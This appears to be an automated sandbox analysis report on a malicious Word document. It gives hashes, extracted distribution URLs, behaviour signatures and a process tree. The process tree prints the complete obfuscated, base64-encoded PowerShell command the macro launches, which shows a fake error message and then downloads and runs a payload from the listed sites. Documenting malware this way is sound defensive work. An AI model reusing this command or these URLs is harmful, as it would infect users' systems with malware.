Analysis
-
max time kernel
54s -
max time network
56s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
10/11/2024, 22:08
Behavioral task
behavioral1
Sample
04062330aac349f5175ccc2cc613ae814fff100077825a82c803636309baf912.doc
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
04062330aac349f5175ccc2cc613ae814fff100077825a82c803636309baf912.doc
Resource
win10v2004-20241007-en
General
-
Target
04062330aac349f5175ccc2cc613ae814fff100077825a82c803636309baf912.doc
-
Size
155KB
-
MD5
81be90af006dfe897d3bc7a6f41b2533
-
SHA1
668b325b769e60be1a2cc4e009ba00e498cbb698
-
SHA256
04062330aac349f5175ccc2cc613ae814fff100077825a82c803636309baf912
-
SHA512
a7c483474b78068015263605a4d5f91af1af10c980d363ef3cc57dabcba955526819453f0d346c87fa008daf95371a5d73b21a2f959a2cb4ce050e09bb4d6b10
-
SSDEEP
3072:CzP09JIVOorWcj9ufstRUUKSns8T00JSHUgteMJ8qMD7gMO:CzPkvCj9ufsfgIf0pL9
Malware Config
Extracted
http://haciaelsup.com/wp-includes/fhPe00/
http://gudafu.com/k/x/
https://raymodul.com/wp-admin/kZPis7j/
https://telelogical.com/user/SP0HX/
https://thinkily.com/css/N/
https://theloveiskindnetwork.com/wp-includes/Z/
https://iotachina.com/wp-content/jYKbuKG/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2968 2824 cmd.exe 31 -
Blocklisted process makes network request 11 IoCs
flow pid Process 5 2860 powershell.exe 6 2860 powershell.exe 7 2860 powershell.exe 9 2860 powershell.exe 11 2860 powershell.exe 13 2860 powershell.exe 14 2860 powershell.exe 16 2860 powershell.exe 18 2860 powershell.exe 19 2860 powershell.exe 21 2860 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2860 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1372 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2860 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1372 WINWORD.EXE 1372 WINWORD.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1372 wrote to memory of 2496 1372 WINWORD.EXE 30 PID 1372 wrote to memory of 2496 1372 WINWORD.EXE 30 PID 1372 wrote to memory of 2496 1372 WINWORD.EXE 30 PID 1372 wrote to memory of 2496 1372 WINWORD.EXE 30 PID 2968 wrote to memory of 2828 2968 cmd.exe 35 PID 2968 wrote to memory of 2828 2968 cmd.exe 35 PID 2968 wrote to memory of 2828 2968 cmd.exe 35 PID 2968 wrote to memory of 2860 2968 cmd.exe 36 PID 2968 wrote to memory of 2860 2968 cmd.exe 36 PID 2968 wrote to memory of 2860 2968 cmd.exe 36
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\04062330aac349f5175ccc2cc613ae814fff100077825a82c803636309baf912.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2496
-
-
C:\Windows\system32\cmd.execmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAdgAgACAATwBwAHEAdQA5ADIAIAAoAFsAdABZAHAAZQBdACgAIgB7ADEAfQB7ADQAfQB7ADMAfQB7ADAAfQB7ADUAfQB7ADIAfQAiACAALQBGACAAJwAuAEQAaQByAEUAJwAsACcAUwAnACwAJwBSAHkAJwAsACcATwAnACwAJwBZAFMAVABFAG0ALgBJACcALAAnAEMAVABPACcAKQAgACAAKQA7AFMAZQB0AC0AaQB0AGUATQAgAHYAQQByAGkAYQBCAEwAZQA6ADQATABhAGkAIAAoACAAWwB0AFkAUABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMQB9AHsAMAB9AHsANgB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAC4AUwBlAFIAdgAnACwAJwBFAE0ALgBuAGUAVAAnACwAJwBTAFQAJwAsACcARwAnACwAJwBzAFkAJwAsACcAZQBSACcALAAnAEkAYwBFAHAAbwBJAE4AVABtAEEATgBhACcAKQApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAJwArACcAbABlACcAKQArACcAbgB0ACcAKwAoACcAbAAnACsAJwB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAFYAbgA2ADQAMABpAHMAPQAkAEQANQA5AFkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFcANwBfAFYAOwAkAEYANgA4AE8APQAoACgAJwBVADQAJwArACcAMAAnACkAKwAnAFEAJwApADsAIAAgACgAIAAgAEcAZQB0AC0AYwBoAEkAbABkAGkAVABlAE0AIAB2AEEAcgBJAGEAYgBMAEUAOgBPAHAAcQB1ADkAMgAgACAAKQAuAHYAYQBMAFUARQA6ADoAIgBDAGAAUgBFAGEAYABUAGUAZABJAHIARQBDAGAAVABPAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBXAG0AJwArACcAMQBGAHgAOQAnACkAKwAnAHcAaQAnACsAKAAnAHcAMABXACcAKwAnAG0AJwApACsAKAAnADEAJwArACcAWABwACcAKQArACgAJwAyADgAJwArACcAcABzAGkAVwBtACcAKwAnADEAJwApACkALgAiAHIAYABlAFAAbABgAEEAQwBlACIAKAAoAFsAYwBIAGEAcgBdADgANwArAFsAYwBIAGEAcgBdADEAMAA5ACsAWwBjAEgAYQByAF0ANAA5ACkALAAnAFwAJwApACkAKQA7ACQATgAxADkARAA9ACgAKAAnAFAAJwArACcAMABfACcAKQArACcATwAnACkAOwAgACAAJAA0AGwAYQBpADoAOgAiAHMAZQBgAGMAdQBSAGkAdABZAHAAYABSAE8AYABUAG8AYABDAE8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUAA0ADIARAA9ACgAJwBOACcAKwAoACcANgA3ACcAKwAnAEIAJwApACkAOwAkAFQAegBiADIAbwBsADEAIAA9ACAAKAAnAEEAJwArACgAJwBfADkAJwArACcASwAnACkAKQA7ACQATQA5ADQAVAA9ACgAJwBPADcAJwArACcAMABLACcAKQA7ACQAQQA2AG0ANgBwAHEAeQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEYAeAA5AHcAJwArACgAJwBpACcAKwAnAHcAMAAnACkAKwAnAHsAMAB9AFgAcAAnACsAJwAyACcAKwAoACcAOABwACcAKwAnAHMAJwApACsAJwBpAHsAMAB9ACcAKQAtAGYAIABbAGMASABhAFIAXQA5ADIAKQArACQAVAB6AGIAMgBvAGwAMQArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEMANwA3AEUAPQAoACcAQQAnACsAKAAnADcAJwArACcANQBBACcAKQApADsAJABFADQAcgBzAHgAcwB3AD0AKAAnAF0AZQAnACsAKAAnADEAcgAnACsAJwBbACcAKwAnAFMAOgAvAC8AJwApACsAJwBoAGEAJwArACgAJwBjAGkAJwArACcAYQBlAGwAcwB1ACcAKwAnAHAAJwApACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQAnACsAJwBpAG4AJwApACsAJwBjAGwAJwArACgAJwB1AGQAZQBzACcAKwAnAC8AJwApACsAJwBmACcAKwAoACcAaABQAGUAMAAnACsAJwAwAC8AQAAnACsAJwBdACcAKQArACcAZQAnACsAKAAnADEAcgBbACcAKwAnAFMAOgAnACsAJwAvAC8AZwAnACkAKwAoACcAdQBkAGEAJwArACcAZgAnACkAKwAoACcAdQAuACcAKwAnAGMAJwArACcAbwAnACsAJwBtAC8AawAvAHgALwBAAF0AZQAnACsAJwAxAHIAWwAnACkAKwAoACcAUwBzADoAJwArACcALwAvAHIAYQAnACsAJwB5ACcAKQArACcAbQBvACcAKwAoACcAZAAnACsAJwB1AGwALgBjACcAKQArACcAbwAnACsAJwBtACcAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKwAnAG4ALwBrAFoAUAAnACkAKwAoACcAaQAnACsAJwBzADcAagAnACsAJwAvAEAAXQBlACcAKQArACgAJwAxACcAKwAnAHIAWwBTACcAKQArACgAJwBzADoALwAnACsAJwAvAHQAZQBsACcAKQArACgAJwBlACcAKwAnAGwAbwBnACcAKwAnAGkAYwAnACkAKwAoACcAYQBsACcAKwAnAC4AJwApACsAJwBjACcAKwAnAG8AJwArACcAbQAvACcAKwAnAHUAcwAnACsAJwBlACcAKwAnAHIAJwArACgAJwAvAFMAUAAnACsAJwAwAEgAJwApACsAKAAnAFgALwBAAF0AZQAnACsAJwAxAHIAJwApACsAKAAnAFsAJwArACcAUwBzADoALwAvACcAKwAnAHQAaAAnACkAKwAnAGkAJwArACcAbgBrACcAKwAoACcAaQBsACcAKwAnAHkALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwBjAHMAJwArACcAcwAvAE4ALwBAAF0AJwApACsAKAAnAGUAMQAnACsAJwByACcAKQArACcAWwAnACsAJwBTACcAKwAnAHMAJwArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAnAHQAaAAnACsAJwBlACcAKwAnAGwAbwAnACsAJwB2AGUAJwArACcAaQAnACsAJwBzACcAKwAoACcAawBpACcAKwAnAG4AZAAnACkAKwAoACcAbgBlAHQAdwAnACsAJwBvACcAKQArACcAcgAnACsAKAAnAGsALgBjAG8AJwArACcAbQAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AYwAnACsAJwBsACcAKQArACgAJwB1AGQAJwArACcAZQAnACkAKwAnAHMAJwArACgAJwAvACcAKwAnAFoALwAnACkAKwAoACcAQABdAGUAMQByAFsAJwArACcAUwAnACsAJwBzADoAJwArACcALwAvACcAKQArACgAJwBpAG8AdAAnACsAJwBhACcAKQArACgAJwBjAGgAJwArACcAaQAnACsAJwBuAGEAJwArACcALgBjACcAKwAnAG8AbQAvAHcAJwArACcAcAAtAGMAbwBuAHQAZQBuAHQALwAnACkAKwAnAGoAJwArACcAWQAnACsAJwBLAGIAJwArACcAdQAnACsAJwBLAEcAJwArACcALwAnACkALgAiAFIAYABlAHAAbABgAEEAQwBFACIAKAAoACcAXQAnACsAKAAnAGUAJwArACcAMQByAFsAUwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAcABgAGwASQB0ACIAKAAkAFcANAA3AFgAIAArACAAJABWAG4ANgA0ADAAaQBzACAAKwAgACQASQA5ADkASAApADsAJABPADQANQBUAD0AKAAnAFcANgAnACsAJwAzAFEAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHYANQBjADUAdgBuACAAaQBuACAAJABFADQAcgBzAHgAcwB3ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPACcAKwAnAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAcwB0AGUAbQAuAG4AZQB0AC4AdwBlAEIAQwBsAGkAZQBOAHQAKQAuACIAZABvAFcAbgBgAEwAbwBBAEQAYABGAGAASQBMAGUAIgAoACQASAB2ADUAYwA1AHYAbgAsACAAJABBADYAbQA2AHAAcQB5ACkAOwAkAEIANgA4AFgAPQAoACgAJwBYACcAKwAnADAANQAnACkAKwAnAEYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEEANgBtADYAcABxAHkAKQAuACIATABgAEUAbgBHAHQAaAAiACAALQBnAGUAIAAzADcAMAAyADQAKQAgAHsAJgAoACcAcgB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQAQQA2AG0ANgBwAHEAeQAsACgAJwBDAG8AJwArACgAJwBuAHQAcgAnACsAJwBvACcAKQArACgAJwBsACcAKwAnAF8AUgB1ACcAKQArACgAJwBuAEQATAAnACsAJwBMACcAKQApAC4AIgBUAE8AYABTAFQAYABSAGkATgBnACIAKAApADsAJABPADkAMwBOAD0AKAAnAEQAJwArACgAJwA1ACcAKwAnADcAUQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVAA3ADgAUgA9ACgAJwBHACcAKwAoACcAMABfACcAKwAnAFoAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEsAOQA5AEUAPQAoACcAUAAnACsAKAAnADgANAAnACsAJwBIACcAKQApAA==1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -w hidden -ENCOD IAAgAHMAdgAgACAATwBwAHEAdQA5ADIAIAAoAFsAdABZAHAAZQBdACgAIgB7ADEAfQB7ADQAfQB7ADMAfQB7ADAAfQB7ADUAfQB7ADIAfQAiACAALQBGACAAJwAuAEQAaQByAEUAJwAsACcAUwAnACwAJwBSAHkAJwAsACcATwAnACwAJwBZAFMAVABFAG0ALgBJACcALAAnAEMAVABPACcAKQAgACAAKQA7AFMAZQB0AC0AaQB0AGUATQAgAHYAQQByAGkAYQBCAEwAZQA6ADQATABhAGkAIAAoACAAWwB0AFkAUABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMQB9AHsAMAB9AHsANgB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAC4AUwBlAFIAdgAnACwAJwBFAE0ALgBuAGUAVAAnACwAJwBTAFQAJwAsACcARwAnACwAJwBzAFkAJwAsACcAZQBSACcALAAnAEkAYwBFAHAAbwBJAE4AVABtAEEATgBhACcAKQApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAJwArACcAbABlACcAKQArACcAbgB0ACcAKwAoACcAbAAnACsAJwB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAFYAbgA2ADQAMABpAHMAPQAkAEQANQA5AFkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFcANwBfAFYAOwAkAEYANgA4AE8APQAoACgAJwBVADQAJwArACcAMAAnACkAKwAnAFEAJwApADsAIAAgACgAIAAgAEcAZQB0AC0AYwBoAEkAbABkAGkAVABlAE0AIAB2AEEAcgBJAGEAYgBMAEUAOgBPAHAAcQB1ADkAMgAgACAAKQAuAHYAYQBMAFUARQA6ADoAIgBDAGAAUgBFAGEAYABUAGUAZABJAHIARQBDAGAAVABPAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBXAG0AJwArACcAMQBGAHgAOQAnACkAKwAnAHcAaQAnACsAKAAnAHcAMABXACcAKwAnAG0AJwApACsAKAAnADEAJwArACcAWABwACcAKQArACgAJwAyADgAJwArACcAcABzAGkAVwBtACcAKwAnADEAJwApACkALgAiAHIAYABlAFAAbABgAEEAQwBlACIAKAAoAFsAYwBIAGEAcgBdADgANwArAFsAYwBIAGEAcgBdADEAMAA5ACsAWwBjAEgAYQByAF0ANAA5ACkALAAnAFwAJwApACkAKQA7ACQATgAxADkARAA9ACgAKAAnAFAAJwArACcAMABfACcAKQArACcATwAnACkAOwAgACAAJAA0AGwAYQBpADoAOgAiAHMAZQBgAGMAdQBSAGkAdABZAHAAYABSAE8AYABUAG8AYABDAE8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUAA0ADIARAA9ACgAJwBOACcAKwAoACcANgA3ACcAKwAnAEIAJwApACkAOwAkAFQAegBiADIAbwBsADEAIAA9ACAAKAAnAEEAJwArACgAJwBfADkAJwArACcASwAnACkAKQA7ACQATQA5ADQAVAA9ACgAJwBPADcAJwArACcAMABLACcAKQA7ACQAQQA2AG0ANgBwAHEAeQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEYAeAA5AHcAJwArACgAJwBpACcAKwAnAHcAMAAnACkAKwAnAHsAMAB9AFgAcAAnACsAJwAyACcAKwAoACcAOABwACcAKwAnAHMAJwApACsAJwBpAHsAMAB9ACcAKQAtAGYAIABbAGMASABhAFIAXQA5ADIAKQArACQAVAB6AGIAMgBvAGwAMQArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEMANwA3AEUAPQAoACcAQQAnACsAKAAnADcAJwArACcANQBBACcAKQApADsAJABFADQAcgBzAHgAcwB3AD0AKAAnAF0AZQAnACsAKAAnADEAcgAnACsAJwBbACcAKwAnAFMAOgAvAC8AJwApACsAJwBoAGEAJwArACgAJwBjAGkAJwArACcAYQBlAGwAcwB1ACcAKwAnAHAAJwApACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQAnACsAJwBpAG4AJwApACsAJwBjAGwAJwArACgAJwB1AGQAZQBzACcAKwAnAC8AJwApACsAJwBmACcAKwAoACcAaABQAGUAMAAnACsAJwAwAC8AQAAnACsAJwBdACcAKQArACcAZQAnACsAKAAnADEAcgBbACcAKwAnAFMAOgAnACsAJwAvAC8AZwAnACkAKwAoACcAdQBkAGEAJwArACcAZgAnACkAKwAoACcAdQAuACcAKwAnAGMAJwArACcAbwAnACsAJwBtAC8AawAvAHgALwBAAF0AZQAnACsAJwAxAHIAWwAnACkAKwAoACcAUwBzADoAJwArACcALwAvAHIAYQAnACsAJwB5ACcAKQArACcAbQBvACcAKwAoACcAZAAnACsAJwB1AGwALgBjACcAKQArACcAbwAnACsAJwBtACcAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKwAnAG4ALwBrAFoAUAAnACkAKwAoACcAaQAnACsAJwBzADcAagAnACsAJwAvAEAAXQBlACcAKQArACgAJwAxACcAKwAnAHIAWwBTACcAKQArACgAJwBzADoALwAnACsAJwAvAHQAZQBsACcAKQArACgAJwBlACcAKwAnAGwAbwBnACcAKwAnAGkAYwAnACkAKwAoACcAYQBsACcAKwAnAC4AJwApACsAJwBjACcAKwAnAG8AJwArACcAbQAvACcAKwAnAHUAcwAnACsAJwBlACcAKwAnAHIAJwArACgAJwAvAFMAUAAnACsAJwAwAEgAJwApACsAKAAnAFgALwBAAF0AZQAnACsAJwAxAHIAJwApACsAKAAnAFsAJwArACcAUwBzADoALwAvACcAKwAnAHQAaAAnACkAKwAnAGkAJwArACcAbgBrACcAKwAoACcAaQBsACcAKwAnAHkALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwBjAHMAJwArACcAcwAvAE4ALwBAAF0AJwApACsAKAAnAGUAMQAnACsAJwByACcAKQArACcAWwAnACsAJwBTACcAKwAnAHMAJwArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAnAHQAaAAnACsAJwBlACcAKwAnAGwAbwAnACsAJwB2AGUAJwArACcAaQAnACsAJwBzACcAKwAoACcAawBpACcAKwAnAG4AZAAnACkAKwAoACcAbgBlAHQAdwAnACsAJwBvACcAKQArACcAcgAnACsAKAAnAGsALgBjAG8AJwArACcAbQAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AYwAnACsAJwBsACcAKQArACgAJwB1AGQAJwArACcAZQAnACkAKwAnAHMAJwArACgAJwAvACcAKwAnAFoALwAnACkAKwAoACcAQABdAGUAMQByAFsAJwArACcAUwAnACsAJwBzADoAJwArACcALwAvACcAKQArACgAJwBpAG8AdAAnACsAJwBhACcAKQArACgAJwBjAGgAJwArACcAaQAnACsAJwBuAGEAJwArACcALgBjACcAKwAnAG8AbQAvAHcAJwArACcAcAAtAGMAbwBuAHQAZQBuAHQALwAnACkAKwAnAGoAJwArACcAWQAnACsAJwBLAGIAJwArACcAdQAnACsAJwBLAEcAJwArACcALwAnACkALgAiAFIAYABlAHAAbABgAEEAQwBFACIAKAAoACcAXQAnACsAKAAnAGUAJwArACcAMQByAFsAUwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAcABgAGwASQB0ACIAKAAkAFcANAA3AFgAIAArACAAJABWAG4ANgA0ADAAaQBzACAAKwAgACQASQA5ADkASAApADsAJABPADQANQBUAD0AKAAnAFcANgAnACsAJwAzAFEAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHYANQBjADUAdgBuACAAaQBuACAAJABFADQAcgBzAHgAcwB3ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPACcAKwAnAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAcwB0AGUAbQAuAG4AZQB0AC4AdwBlAEIAQwBsAGkAZQBOAHQAKQAuACIAZABvAFcAbgBgAEwAbwBBAEQAYABGAGAASQBMAGUAIgAoACQASAB2ADUAYwA1AHYAbgAsACAAJABBADYAbQA2AHAAcQB5ACkAOwAkAEIANgA4AFgAPQAoACgAJwBYACcAKwAnADAANQAnACkAKwAnAEYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEEANgBtADYAcABxAHkAKQAuACIATABgAEUAbgBHAHQAaAAiACAALQBnAGUAIAAzADcAMAAyADQAKQAgAHsAJgAoACcAcgB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQAQQA2AG0ANgBwAHEAeQAsACgAJwBDAG8AJwArACgAJwBuAHQAcgAnACsAJwBvACcAKQArACgAJwBsACcAKwAnAF8AUgB1ACcAKQArACgAJwBuAEQATAAnACsAJwBMACcAKQApAC4AIgBUAE8AYABTAFQAYABSAGkATgBnACIAKAApADsAJABPADkAMwBOAD0AKAAnAEQAJwArACgAJwA1ACcAKwAnADcAUQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVAA3ADgAUgA9ACgAJwBHACcAKwAoACcAMABfACcAKwAnAFoAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEsAOQA5AEUAPQAoACcAUAAnACsAKAAnADgANAAnACsAJwBIACcAKQApAA==2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860
-